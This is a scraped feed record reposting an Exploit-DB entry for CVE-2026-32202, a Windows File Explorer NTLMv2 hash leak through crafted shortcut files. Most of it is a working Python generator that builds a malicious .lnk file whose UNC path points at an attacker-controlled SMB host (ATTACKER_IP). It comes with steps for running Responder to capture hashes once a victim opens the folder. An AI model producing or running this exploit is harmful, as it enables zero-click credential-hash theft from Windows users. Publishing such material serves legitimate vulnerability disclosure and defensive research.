{“lastseen”:”2026-05-29T11:29:17″,”description”:”Titles: Microsoft – NTLMv2 Hash Capture Author: nu11secur1ty Date: 2026-05-27 Vendor: Microsoft Software: Windows Shell File Explorer Reference: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-32202 Description: A spoofing vulnerability in Windows Shell File…”,”published”:”2026-05-29T00:00:00″,”modified”:”2026-05-29T00:00:00″,”type”:”exploitdb”,”title”:”Microsoft – NTLMv2 Hash Capture”,”source”:””,”references”:””,”id”:”EDB-ID:52601″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-32202″],”sourceData”:”# Titles: Microsoft – NTLMv2 Hash Capture\\r\\n# Author: nu11secur1ty\\r\\n# Date: 2026-05-27\\r\\n# Vendor: Microsoft\\r\\n# Software: Windows Shell (File Explorer)\\r\\n# Reference: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-32202\\r\\n\\r\\n## Description:\\r\\nA spoofing vulnerability in Windows Shell (File Explorer) allows an\\r\\nattacker to capture NTLMv2 hashes without user interaction. By crafting a\\r\\nmalicious .lnk (shortcut) file with a UNC path pointing to an\\r\\nattacker-controlled SMB server, the target’s Windows system automatically\\r\\nsends an NTLMv2 authentication request when the folder containing the .lnk\\r\\nfile is opened. No click on the shortcut is required \u2013 simply viewing the\\r\\nfolder triggers the vulnerability.\\r\\n\\r\\n**CVSS**: 4.3 (Medium) \u2013 NetNTLMv2 hash leak\\r\\n**Attack Vector**: Network (SMB)\\r\\n**Privileges Required**: None (user only needs to open a folder)\\r\\n**User Interaction**: None (zero-click)\\r\\n\\r\\n**Affected Versions**:\\r\\n- Windows 11 23H2, 24H2, 25H2, 26H1\\r\\n- Windows 10 21H2-22H2\\r\\n- Windows Server 2019\/2022\/2025\\r\\n\\r\\n**Patch**: Microsoft April 2026 Patch Tuesday (KB2026-04214)\\r\\n\\r\\nSTATUS: MEDIUM – HIGH\/ Vulnerability\\r\\n\\r\\n[+]Payload:\\r\\n\\r\\n“`POST\\r\\nSMB\/CIFS NTLMv2 Authentication Request\\r\\nUNC Path: \\\\\\\\ATTACKER_IP\\\\share\\\\payload.dll\\r\\nProtocol: SMB2 (port 445)\\r\\nHash Type: NetNTLMv2\\r\\n“`\\r\\n[+]Exploit:\\r\\n\\r\\n“`\\r\\n#!\/usr\/bin\/env python3\\r\\n\\”\\”\\”\\r\\nCVE-2026-32202 LNK Exploit Generator\\r\\nAuthor: nu11secur1ty\\r\\nGenerates LNK file that leaks NTLM hash to Responder\/Impacket\\r\\n\\”\\”\\”\\r\\n\\r\\nimport struct\\r\\nimport sys\\r\\nimport os\\r\\n\\r\\ndef create_malicious_lnk(attacker_ip, output_file=\\”exploit.lnk\\”,\\r\\nshare_name=\\”share\\”):\\r\\n \\”\\”\\”\\r\\n Creates LNK file with UNC path to attacker machine\\r\\n \\”\\”\\”\\r\\n\\r\\n unc_path = f\\”\\\\\\\\\\\\\\\\{attacker_ip}\\\\\\\\{share_name}\\\\\\\\test\\”\\r\\n unc_utf16 = unc_path.encode(‘utf-16le’) + b’\\\\x00\\\\x00’\\r\\n\\r\\n # LNK structure (standard + vulnerable component)\\r\\n lnk = bytearray()\\r\\n\\r\\n # ===== HEADER (76 bytes) =====\\r\\n lnk.extend(struct.pack(‘\\u003cI’, 0x0000004C)) # HeaderSize\\r\\n # LinkCLSID: {00021401-0000-0000-C000-000000000046}\\r\\n\\r\\nlnk.extend(b’\\\\x01\\\\x14\\\\x02\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x46′)\\r\\n lnk.extend(struct.pack(‘\\u003cI’, 0x000002A3)) # LinkFlags\\r\\n(HasName|HasWorkingDir|HasArguments|IsUnicode)\\r\\n lnk.extend(struct.pack(‘\\u003cI’, 0x00000080)) # FileAttributes (NORMAL)\\r\\n lnk.extend(struct.pack(‘\\u003cQ’, 0)) # CreationTime\\r\\n lnk.extend(struct.pack(‘\\u003cQ’, 0)) # AccessTime\\r\\n lnk.extend(struct.pack(‘\\u003cQ’, 0)) # WriteTime\\r\\n lnk.extend(struct.pack(‘\\u003cI’, 0x00001000)) # FileSize\\r\\n lnk.extend(struct.pack(‘\\u003cI’, 0x00000000)) # IconIndex\\r\\n lnk.extend(struct.pack(‘\\u003cI’, 0x00000001)) # ShowCommand (SW_NORMAL)\\r\\n lnk.extend(struct.pack(‘\\u003cH’, 0x0000)) # Hotkey\\r\\n lnk.extend(b’\\\\x00\\\\x00′) # Reserved\\r\\n lnk.extend(b’\\\\x00\\\\x00\\\\x00\\\\x00′) # Reserved2\\r\\n lnk.extend(b’\\\\x00\\\\x00\\\\x00\\\\x00′) # Reserved3\\r\\n\\r\\n # ===== IDLIST (activates when folder is opened) =====\\r\\n # Shell Folder IDITEM\\r\\n lnk.extend(b’\\\\x14\\\\x00′) # ItemID size (20 bytes)\\r\\n\\r\\nlnk.extend(b’\\\\x2e\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00′)\\r\\n lnk.extend(b’\\\\x00\\\\x00′) # Terminating ID\\r\\n\\r\\n # ===== STRING DATA (CRITICAL FOR EXPLOIT) =====\\r\\n # NameString (UNC path – triggers NTLM hash leak)\\r\\n lnk.extend(struct.pack(‘\\u003cH’, len(unc_utf16)))\\r\\n lnk.extend(unc_utf16)\\r\\n\\r\\n # ArgumentsString (empty)\\r\\n lnk.extend(b’\\\\x00\\\\x00′)\\r\\n\\r\\n # WorkingDir (UNC path again)\\r\\n lnk.extend(struct.pack(‘\\u003cH’, len(unc_utf16)))\\r\\n lnk.extend(unc_utf16)\\r\\n\\r\\n # ===== Console Properties (required for some Windows versions) =====\\r\\n lnk.extend(b’\\\\x50\\\\x00\\\\x14\\\\x00′) # dwWindowSize (80×20)\\r\\n lnk.extend(b’\\\\x50\\\\x00\\\\xfa\\\\x00′) # dwBufferSize (80×250)\\r\\n lnk.extend(b’\\\\x00\\\\x00\\\\x00\\\\x00′) # dwFontSize\\r\\n lnk.extend(b’\\\\x00\\\\x00\\\\x00\\\\x00′) # dwFontFamily\\r\\n lnk.extend(b’\\\\x00\\\\x00\\\\x00\\\\x00′) # dwFaceNameLen\\r\\n lnk.extend(b’\\\\x00\\\\x00\\\\x00\\\\x00′) # dwFaceNameOffset\\r\\n lnk.extend(b’\\\\x00\\\\x00\\\\x00\\\\x00′) # dwStyle\\r\\n # 64 bytes padding\\r\\n lnk.extend(b’\\\\x00′ * 64)\\r\\n\\r\\n # Save the file\\r\\n with open(output_file, ‘wb’) as f:\\r\\n f.write(lnk)\\r\\n\\r\\n return output_file, unc_path\\r\\n\\r\\ndef main():\\r\\n print(r\\”\\”\\”\\r\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\r\\n \u2551 CVE-2026-32202 – LNK Generator \u2551\\r\\n \u2551 Author: nu11secur1ty \u2551\\r\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\r\\n \\”\\”\\”)\\r\\n\\r\\n if len(sys.argv) \\u003c 2:\\r\\n print(\\”Usage: python3 cve_2026_32202_gen.py \\u003cATTACKER_IP\\u003e\\r\\n[output_file]\\”)\\r\\n print(\\”Example: python3 cve_2026_32202_gen.py 192.168.1.100\\r\\ninvoice.lnk\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n attacker_ip = sys.argv[1]\\r\\n output_file = sys.argv[2] if len(sys.argv) \\u003e 2 else \\”exploit.lnk\\”\\r\\n\\r\\n lnk_file, unc_path = create_malicious_lnk(attacker_ip, output_file)\\r\\n\\r\\n print(f\\”[+] Exploit ready!\\”)\\r\\n print(f\\”[+] File: {lnk_file}\\”)\\r\\n print(f\\”[+] UNC path: {unc_path}\\”)\\r\\n print()\\r\\n print(\\”[*] Next steps:\\”)\\r\\n print(f\\” 1. Start Responder: sudo responder -I eth0 -v\\”)\\r\\n print(f\\” 2. Transfer {lnk_file} to Windows 11 Desktop\\”)\\r\\n print(f\\” 3. Open Desktop in File Explorer (no click required)\\”)\\r\\n print(f\\” 4. Watch Responder – NTLM hash will appear\\”)\\r\\n print()\\r\\n\\r\\n with open(\\”start_responder.sh\\”, \\”w\\”) as f:\\r\\n f.write(\\”#!\/bin\/bash\\\\n\\”)\\r\\n f.write(\\”echo \\\\\\”[+] Starting Responder…\\\\\\”\\\\n\\”)\\r\\n f.write(\\”sudo responder -I eth0 -v\\\\n\\”)\\r\\n os.chmod(\\”start_responder.sh\\”, 0o755)\\r\\n print(\\”[+] Helper script created: start_responder.sh\\”)\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()\\r\\n“`\\r\\n\\r\\n\\r\\nDemo:\\r\\n[href](https:\/\/www.patreon.com\/posts\/cve-2026-32202-159362448)\\r\\n\\r\\nCode:\\r\\n[code](\\r\\nhttps:\/\/github.com\/nu11secur1ty\/CVE-mitre\/tree\/main\/2026\/CVE-2026-32202)\\r\\n\\r\\nTime spent:\\r\\n02:30:00\\r\\n\\r\\n–\\r\\nSystem Administrator – Infrastructure Engineer\\r\\nPenetration Testing Engineer\\r\\nExploit developer at https:\/\/packetstormsecurity.com\/\\r\\nhttps:\/\/cve.mitre.org\/index.html\\r\\nhttps:\/\/cxsecurity.com\/ and https:\/\/www.exploit-db.com\/\\r\\nhome page: https:\/\/www.asc3t1c-nu11secur1ty.com\/\\r\\nhiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=\\r\\nnu11secur1ty https:\/\/www.asc3t1c-nu11secur1ty.com\/\\r\\n\\r\\nOn Wed, May 27, 2026 at 2:06\u202fPM Offsec Exploits \\u003c\\r\\nsubmit@offensive-security.com\\u003e wrote:\\r\\n\\r\\n\\u003e Hello,\\r\\n\\u003e\\r\\n\\u003e Thank you for your submission.\\r\\n\\u003e We will be checking it shortly.\\r\\n\\u003e\\r\\n\\u003e Regards\\r\\n\\u003e – Exploit-DB Team\\r\\n\\u003e\\r\\n\\r\\n\\r\\n– \\r\\n\\r\\nSystem Administrator – Infrastructure Engineer\\r\\nPenetration Testing Engineer\\r\\nExploit developer at https:\/\/packetstorm.news\/\\r\\nhttps:\/\/cve.mitre.org\/index.html\\r\\nhttps:\/\/cxsecurity.com\/ and https:\/\/www.exploit-db.com\/\\r\\n0day Exploit DataBase https:\/\/0day.today\/\\r\\nhome page: https:\/\/www.asc3t1c-nu11secur1ty.com\/\\r\\nhiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=\\r\\n nu11secur1ty \\u003chttp:\/\/nu11secur1ty.com\/\\u003e”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52601″,”cvss”:{“score”:4.3,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:L\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52601″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-29T11:29:17″,”description”:”Titles: Microsoft – NTLMv2 Hash Capture Author: nu11secur1ty Date: 2026-05-27 Vendor: Microsoft Software: Windows Shell File Explorer Reference: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-32202 Description: A spoofing vulnerability in Windows…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,123,12,40,21,13,7,11,5],"class_list":["post-58041","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-43","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n